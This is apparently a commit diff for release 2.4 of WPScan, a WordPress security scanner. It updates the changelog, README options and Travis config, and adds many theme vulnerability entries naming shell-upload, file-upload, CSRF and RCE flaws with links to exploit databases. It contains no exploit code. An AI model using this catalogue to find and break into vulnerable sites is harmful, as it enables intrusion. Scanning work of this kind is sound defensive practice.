Bumping 2.4

-) Fixed options
-) Fixed "unrecognized method 'verbose' for nil:NilClass when supplying an unknown option

.travis.yml

@@ -4,4 +4,8 @@ rvm:
   - 1.9.3
   - 2.0.0
   - 2.1.0
+  - 2.1.1
 script: bundle exec rspec --format documentation
+notifications:
+  email:
+    - wpscanteam@gmail.com

CHANGELOG.md

@@ -1,6 +1,61 @@
 # Changelog
 ## Master
-[Work in progress](https://github.com/wpscanteam/wpscan/compare/2.3...master)
+[Work in progress](https://github.com/wpscanteam/wpscan/compare/2.4...master)
+
+## Version 2.4
+Released: 2014-04-17
+
+New
+* '--batch' switch option added - Fix #454
+* Add random-agent
+* Added more CLI options
+* Switch over to nist - Fix #301
+* New choice added when a redirection is detected - Fix #438
+
+
+Removed
+* Removed 'Total WordPress Sites in the World' counter from stats
+* Old wpscan repo links removed - Fix #440
+* Fingerprinting Dev script removed
+* Useless code removed
+
+General core
+* Rspecs update
+* Forcing Travis notify the team
+* Ruby 2.1.1 added to Travis
+* Equal output layout for interaction questions
+* Only output error trace if verbose if enabled
+* Memory improvements during wp-items enumerations
+* Fixed broken link checker, fixed some broken links
+* Couple more 404s fixed
+* Themes & Plugins list updated
+
+WordPress Fingerprints
+* WP 3.8.2 & 3.7.2 Fingerprints added - Fix #448
+* WP 3.8.3 & 3.7.3 fingerprints
+* WP 3.9 fingerprints
+
+Fixed issues
+* Fix #380 - Redirects in WP 3.6-3.0
+* Fix #413 - Check the version of the Timthumbs files found
+* Fix #429 - Error WpScan Cache Browser
+* Fix #431 - Version number comparison between '2.3.3' and '0.42b'
+* Fix #439 - Detect if the target goes down during the scan
+* Fix #451 - Do not rely only on files in wp-content for fingerprinting
+* Fix #453 - Documentation or inplemention of option parameters
+* Fix #455 - Fails with a message if the target returns a 403 during the wordpress check
+
+Vulnerabilities
+* Update WordPress Vulnerabilities
+* Fixed some duplicate vulnerabilities
+
+WPScan Database Statistics:
+* Total vulnerable versions: 79; 1 is new
+* Total vulnerable plugins: 748; 55 are new
+* Total vulnerable themes: 292; 41 are new
+* Total version vulnerabilities: 617; 326 are new
+* Total plugin vulnerabilities: 1162; 146 are new
+* Total theme vulnerabilities: 330; 47 are new
 
 ## Version 2.3
 Released: 2014-02-11
@@ -12,7 +67,7 @@ New
 * New spell checker!
 * Added database modification dates in status report
 * Added 'Total WordPress Sites in the World' statistics
-* Added separator between Name and Version in Item 
+* Added separator between Name and Version in Item
 * Added a "Work in progress" URL in the CHANGELOG
 
 Removed
@@ -44,7 +99,7 @@ WPScan Database Statistics:
 * Total plugin vulnerabilities: 1016; 236 are new
 * Total theme vulnerabilities: 283; 79 are new
 
-Add WP Fingerprints
+WordPress Fingerprints
 * Better fingerprints
 * WP 3.8.1 Fingerprinting
 * WP 3.8 Fingerprinting
@@ -53,10 +108,10 @@ Fixed issues
 * Fix #404 - Brute forcing issue over https
 * Fix #398 - Removed a fake vuln in WP Super Cache
 * Fix #393 - sudo added to the bundle install cmd for Mac OSX
-* Fix #228, #327 - Infinite loop when self-redirect 
+* Fix #228, #327 - Infinite loop when self-redirect
 * Fix #201 - Incorrect Paramter Parsing when no url was supplied
 
-## Version 2.2 
+## Version 2.2
 Released: 2013-11-12
 
 New

Gemfile

@@ -1,6 +1,6 @@
 source "https://rubygems.org"
 
-gem "typhoeus", ">=0.6.3"
+gem "typhoeus", "~>0.6.8"
 gem "nokogiri"
 gem "json"
 gem "terminal-table"

README

@@ -82,7 +82,6 @@ ryandewhurst at gmail
 
   - Typhoeus segmentation fault:
       Update cURL to version => 7.21 (may have to install from source)
-      See http://code.google.com/p/wpscan/issues/detail?id=81
 
   - Proxy not working:
       Update cURL to version => 7.21.7 (may have to install from source).
@@ -142,6 +141,10 @@ ryandewhurst at gmail
 
 --config-file | -c <config file> Use the specified config file
 
+--user-agent | -a <User-Agent> Use the specified User-Agent
+
+--random-agent | -r Use a random User-Agent
+
 --follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not
 
 --wp-content-dir <wp content dir>  WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
@@ -161,6 +164,14 @@ ryandewhurst at gmail
 
 --username | -U <username>  Only brute force the supplied username.
 
+--cache-ttl <cache-ttl>  Typhoeus cache TTL
+
+--request-timeout <request-timeout>  Request Timeout
+
+--connect-timeout <connect-timeout>  Connect Timeout
+
+--max-threads <max-threads>  Maximum Threads
+
 --help     | -h This help screen.
 
 --verbose  | -v Verbose output.

README.md

@@ -90,7 +90,6 @@ Apple Xcode, Command Line Tools and the libffi are needed (to be able to install
   - Typhoeus segmentation fault
 
       Update cURL to version => 7.21 (may have to install from source)
-      See http://code.google.com/p/wpscan/issues/detail?id=81
 
   - Proxy not working
 
@@ -156,6 +155,10 @@ Apple Xcode, Command Line Tools and the libffi are needed (to be able to install
 
     --config-file | -c <config file> Use the specified config file
 
+    --user-agent | -a <User-Agent> Use the specified User-Agent
+
+    --random-agent | -r Use a random User-Agent
+
     --follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not
 
     --wp-content-dir <wp content dir>  WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
@@ -175,6 +178,14 @@ Apple Xcode, Command Line Tools and the libffi are needed (to be able to install
 
     --username | -U <username>  Only brute force the supplied username.
 
+    --cache-ttl <cache-ttl>  Typhoeus cache TTL
+
+    --request-timeout <request-timeout>  Request Timeout
+
+    --connect-timeout <connect-timeout>  Connect Timeout
+
+    --max-threads <max-threads>  Maximum Threads
+
     --help     | -h This help screen.
 
     --verbose  | -v Verbose output.

conf/browser.conf.json

@@ -1,65 +0,0 @@
-{
-  "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
-  /* Modes :
-    static : will use the defined user_agent for each request
-    semi-static : will randomly choose a user agent into available_user_agents before each scan
-    random : each request will choose a random user agent in available_user_agents
-  */
-  "user_agent_mode": "static",
-
-  /* Uncomment the "proxy" line to use the proxy
-    SOCKS proxies (4, 4A, 5) are supported, ie : "proxy": "socks5://127.0.0.1:9000"
-    If you do not specify the protocol, http will be used
-  */
-  //"proxy": "127.0.0.1:3128",
-  //"proxy_auth": "username:password",
-
-  "cache_ttl": 600, // 10 minutes, at this time the cache is cleaned before each scan. If this value is set to 0, the cache will be disabled
-
-  "request_timeout": 2000, // 2s
-
-  "connect_timeout": 1000, // 1s
-
-  "max_threads": 20,
-
-  // Some user_agents can be found there http://techpatterns.com/downloads/firefox/useragentswitcher.xml (thx to Gianluca Brindisi)
-  "available_user_agents":
-  [
-    // Windows
-    "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
-    "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
-    "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
-    "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
-    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
-    "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
-    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
-    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
-    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)",
-    "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
-    "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
-
-    // MAC
-    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13",
-    "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15",
-    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
-    "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3",
-    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
-    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
-    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
-
-    // Linux
-    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
-    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
-    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
-    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
-    "Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0",
-    "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
-    "Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0"
-  ]
-}

data/theme_vulns.xml

@@ -93,6 +93,13 @@
       </references>
       <type>UPLOAD</type>
     </vulnerability>
+    <vulnerability>
+      <title>vithy - Custom Background Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125827/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
   </theme>
 
   <theme name="appius">
@@ -110,6 +117,13 @@
       </references>
       <type>UPLOAD</type>
     </vulnerability>
+    <vulnerability>
+      <title>appius - Custom Background Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125827/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
   </theme>
 
   <theme name="yvora">
@@ -144,6 +158,13 @@
       </references>
       <type>UPLOAD</type>
     </vulnerability>
+    <vulnerability>
+      <title>Shotzz - Custom Background Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125827/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
   </theme>
 
   <theme name="dagda">
@@ -154,6 +175,13 @@
       </references>
       <type>UPLOAD</type>
     </vulnerability>
+    <vulnerability>
+      <title>dagda - Custom Background Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125827/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
   </theme>
 
   <theme name="moneymasters">
@@ -534,6 +562,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -584,6 +613,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -594,6 +624,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -614,6 +645,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -624,6 +656,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -634,6 +667,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -1811,12 +1845,20 @@
 
   <theme name="archin">
     <vulnerability>
-      <title>Archin - Cross-Site Scripting and Arbitrary File Upload Vulnerabilities</title>
+      <title>Archin 3.2 - Cross-Site Scripting and Arbitrary File Upload Vulnerabilities</title>
       <references>
         <secunia>50711</secunia>
       </references>
       <type>MULTI</type>
     </vulnerability>
+    <vulnerability>
+      <title>Archin 3.2 - hades_framework/option_panel/ajax.php Configuration Option Manipulation</title>
+      <references>
+        <osvdb>86991</osvdb>
+        <exploitdb>21646</exploitdb>
+      </references>
+      <type>RCE</type>
+    </vulnerability>
   </theme>
 
   <theme name="purity">
@@ -1899,6 +1941,13 @@
       </references>
       <type>XSS</type>
     </vulnerability>
+    <vulnerability>
+      <title>felici - Custom Background Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125830/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
   </theme>
 
   <theme name="classic">
@@ -1947,7 +1996,7 @@
     <vulnerability>
       <title>Xss In wordpress ambience theme</title>
       <references>
-        <url>http://packetstorm.igor.onlinedirect.bg/1306-exploits/wpambience-xss.txt</url>
+        <url>http://www.websecuritywatch.com/wordpress-ambience-xss/</url>
       </references>
       <type>XSS</type>
     </vulnerability>
@@ -1987,6 +2036,7 @@
       <title>Persuasion &lt;= 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://packetstormsecurity.com/files/124547/</url>
         <url>http://www.securityfocus.com/bid/64501</url>
@@ -2435,6 +2485,7 @@
       <title>Highlight Powerful Premium - upload-handler.php File Upload CSRF</title>
       <references>
         <osvdb>99703</osvdb>
+        <secunia>55671</secunia>
         <exploitdb>29525</exploitdb>
         <url>http://packetstormsecurity.com/files/123974/</url>
       </references>
@@ -2562,7 +2613,7 @@
       <type>UPLOAD</type>
     </vulnerability>
   </theme>
-  
+
   <theme name="OptimizePress">
     <vulnerability>
       <title>OptimizePress - File Upload Vulnerability</title>
@@ -2578,7 +2629,7 @@
     </vulnerability>
   </theme>
 
-  <theme name="Blooog-v1.1">
+  <theme name="blooog">
     <vulnerability>
       <title>Blooog 1.1 - jplayer.swf Cross Site Scripting</title>
       <references>
@@ -2707,6 +2758,7 @@
       <title>DejaVu 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2730,6 +2782,7 @@
       <title>Elegance 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2753,6 +2806,7 @@
       <title>Echelon 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2776,6 +2830,7 @@
       <title>Modular 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2799,6 +2854,7 @@
       <title>Fusion 2.1 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2822,6 +2878,7 @@
       <title>Method 2.1 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2845,6 +2902,7 @@
       <title>Myriad 2.0 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2868,6 +2926,7 @@
       <title>Construct 1.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2891,6 +2950,7 @@
       <title>Awake 3.3 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2922,6 +2982,7 @@
       <title>InFocus 3.3 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2987,4 +3048,483 @@
     </vulnerability>
   </theme>
 
+  <theme name="kiddo">
+    <vulnerability>
+      <title>Kiddo - remote shell upload vulnerability</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125138/</url>
+        <secunia>56874</secunia>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="thecotton_v114">
+    <vulnerability>
+      <title>The Cotton - Remote File Upload Vulnerability</title>
+      <references>
+        <osvdb>103911</osvdb>
+        <url>http://packetstormsecurity.com/files/125506/</url>
+        <url>http://www.securityfocus.com/bid/65958</url>
+        <url>http://seclists.org/bugtraq/2014/Mar/9</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="Realestate">
+    <vulnerability>
+      <title>Real Estate - Templatic Theme CSRF File Upload Vulnerability</title>
+      <references>
+        <url>http://1337day.com/exploit/22091</url>
+      </references>
+      <type>CSRF</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="dailydeal">
+    <vulnerability>
+      <title>Dailydeal - Templatic Theme CSRF File Upload Vulnerability</title>
+      <references>
+        <url>http://1337day.com/exploit/22091</url>
+      </references>
+      <type>CSRF</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="nightlife">
+    <vulnerability>
+      <title>Nightlife - Templatic Theme CSRF File Upload Vulnerability</title>
+      <references>
+        <url>http://1337day.com/exploit/22091</url>
+      </references>
+      <type>CSRF</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="5star">
+    <vulnerability>
+      <title>5star - Templatic Theme CSRF File Upload Vulnerability</title>
+      <references>
+        <url>http://1337day.com/exploit/22091</url>
+      </references>
+      <type>CSRF</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="specialist">
+    <vulnerability>
+      <title>Specialist - Templatic Theme CSRF File Upload Vulnerability</title>
+      <references>
+        <url>http://1337day.com/exploit/22091</url>
+      </references>
+      <type>CSRF</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="flatshop">
+    <vulnerability>
+      <title>Flatshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="magazine">
+    <vulnerability>
+      <title>Magazine - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="parallax">
+    <vulnerability>
+      <title>Parallax - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="bold">
+    <vulnerability>
+      <title>Bold - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="metro">
+    <vulnerability>
+      <title>Metro - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="pinshop">
+    <vulnerability>
+      <title>Pinshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="agency">
+    <vulnerability>
+      <title>Agency - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="slide">
+    <vulnerability>
+      <title>Slide - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="postline">
+    <vulnerability>
+      <title>Postline - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="fullscreen">
+    <vulnerability>
+      <title>Fulscreen - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="shopo">
+    <vulnerability>
+      <title>Shopo - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="minshop">
+    <vulnerability>
+      <title>Minshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="notes">
+    <vulnerability>
+      <title>Notes - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="shopdock">
+    <vulnerability>
+      <title>Shopdock - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="phototouch">
+    <vulnerability>
+      <title>Phototouch - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="basic">
+    <vulnerability>
+      <title>Basic - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="responz">
+    <vulnerability>
+      <title>Responz - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="simfo">
+    <vulnerability>
+      <title>Simfo - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="grido">
+    <vulnerability>
+      <title>Grido - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="tisa">
+    <vulnerability>
+      <title>Tisa - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="funki">
+    <vulnerability>
+      <title>Funki - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="minblr">
+    <vulnerability>
+      <title>Minblr - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="newsy">
+    <vulnerability>
+      <title>Newsy - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="wumblr">
+    <vulnerability>
+      <title>Wumblr - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="rezo">
+    <vulnerability>
+      <title>Rezo - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="photobox">
+    <vulnerability>
+      <title>Photobox - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="edmin">
+    <vulnerability>
+      <title>Edmin - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
